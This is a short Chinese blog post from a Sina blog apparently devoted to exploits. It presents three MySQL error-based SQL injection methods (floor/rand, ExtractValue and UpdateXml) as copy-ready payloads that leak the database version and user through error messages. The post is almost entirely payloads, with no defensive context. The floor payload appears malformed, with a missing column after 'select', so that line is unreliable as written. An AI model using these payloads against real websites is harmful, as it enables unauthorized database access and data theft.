加载中…
个人资料
0day_exp
0day_exp
  • 博客等级:
  • 博客积分:0
  • 博客访问:1,564
  • 关注人气:0
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
相关博文
推荐博文
谁看过这篇博文
加载中…
正文 字体大小:

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

(2015-04-17 17:03:16)
标签:

it

分类: 注入

1、通过floor报错

可以通过如下一些利用代码

and (select from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

mysql <wbr>,floor,ExtractValue,UpdateXml三种报错模式注入利用方法


       2、ExtractValue

and extractvalue(1,concat(0x7e,user()));

mysql <wbr>,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

3、UpdateXml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

mysql <wbr>,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

注:MySQL 5.1.5版本后才包含ExtractValue()和UpdateXML()这2个函数


mysql <wbr>,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

mysql <wbr>,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

0

阅读 评论 收藏 禁止转载 喜欢 打印举报/Report
  • 评论加载中,请稍候...
发评论

    发评论

    以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

      

    新浪BLOG意见反馈留言板 电话:4000520066 提示音后按1键(按当地市话标准计费) 欢迎批评指正

    新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

    新浪公司 版权所有